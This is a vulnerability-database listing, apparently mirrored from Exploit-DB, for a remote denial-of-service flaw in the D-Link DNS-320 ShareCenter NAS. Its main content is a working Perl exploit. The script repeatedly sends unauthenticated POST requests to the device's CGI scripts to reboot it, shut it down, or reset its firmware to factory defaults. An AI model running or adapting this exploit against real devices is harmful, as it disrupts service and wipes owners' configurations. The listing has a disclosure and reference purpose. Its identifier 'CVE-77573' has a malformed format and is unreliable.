Sign-up

ID

VAR-E-201112-0378


EDB ID

18199


TITLE

D-Link DNS-320 ShareCenter - Remote Reboot/Shutdown/Reset (Denial of Service) - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 18199

DESCRIPTION

D-Link DNS-320 ShareCenter - Remote Reboot/Shutdown/Reset (Denial of Service). CVE-77573 . dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 18199

AFFECTED PRODUCTS

vendor:d linkmodel:dns-320 sharecenterscope: - version: -

Trust: 1.0

vendor:sharecentermodel:d-link dns-320scope: - version: -

Trust: 0.6

sources: EXPLOIT-DB: 18199 // EDBNET: 40652

EXPLOIT

#!/usr/bin/perl
#
# Title: ShareCenter D-Link DNS-320 remote reboot/shutdown/reset (DoS).
# Type: Hardware
# Remote: yes
# Author: rigan - imrigan [sobachka] gmail.com
#
# Tested on:
# Firmware : DNS320-v2.00b06
#
# Security flaws:
# dsk_mgr.cgi allows execute reboot via POST request with parameter cmd=FMT_restart.
# system_mgr.cgi allows execute reboot via POST request with parameter cmd=cgi_restart or cmd=cgi_reboot.
# system_mgr.cgi allows execte shutdown via POST request with parameter cmd=cgi_shutdown.
# wizard_mgr.cgi allows to reset the firmware to default settings via POST request with parameter cmd=cgi_wizard.

use LWP::UserAgent;

print "[*] ShareCenter D-Link DNS-320 Remote Dos Exploit\n";

if (@ARGV != 3){ &usage; }

while (@ARGV > 0){
$ip = shift(@ARGV);
$port = shift(@ARGV);
$mode = shift(@ARGV);
}

@cgi = ("dsk_mgr.cgi", "system_mgr.cgi", "wizard_mgr.cgi", "system_mgr.cgi");
@cmd = ("cmd=FMT_restart", "cmd=cgi_restart", "cmd=cgi_wizard", "cmd=cgi_shutdown");

$url = "http://".$ip.":".$port."/cgi-bin/".$cgi[$mode];

print "[*] DoS............................................. \n";
while(1){
my $ua = new LWP::UserAgent;
my $req = HTTP::Request->new(POST=>$url);
$req->content_type('application/x-www-form-urlencoded');
$req->content($cmd[$mode]);
my $res = $ua->request($req);
}

sub usage(){
print "Usage: perl dlink.pl [target ip] [port] [0,1,2,3] \n";
print "================================================= \n";
print "0 - dsk_mgr.cgi cmd=FMT_restart [Reboot] \n";
print "1 - system_mgr.cgi cmd=cgi_restart [Reboot] \n";
print "2 - wizard_mgr.cgi cmd=cgi_wizard [Reset] \n";
print "3 - system_mgr.cgi cmd=shutdown [Shutdown] \n";
exit;
}

Trust: 1.0

sources: EXPLOIT-DB: 18199

EXPLOIT LANGUAGE

pl

Trust: 0.6

sources: EXPLOIT-DB: 18199

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 18199

TYPE

Remote Reboot/Shutdown/Reset (Denial of Service)

Trust: 1.0

sources: EXPLOIT-DB: 18199

CREDITS

rigan

Trust: 0.6

sources: EXPLOIT-DB: 18199

EXTERNAL IDS

db:EXPLOIT-DBid:18199

Trust: 1.6

db:EDBNETid:40652

Trust: 0.6

sources: EXPLOIT-DB: 18199 // EDBNET: 40652

REFERENCES

url:https://www.exploit-db.com/exploits/18199/

Trust: 0.6

sources: EDBNET: 40652

SOURCES

db:EXPLOIT-DBid:18199
db:EDBNETid:40652

LAST UPDATE DATE

2022-07-27T09:54:37.919000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:18199date:2011-12-05T00:00:00
db:EDBNETid:40652date:2011-12-05T00:00:00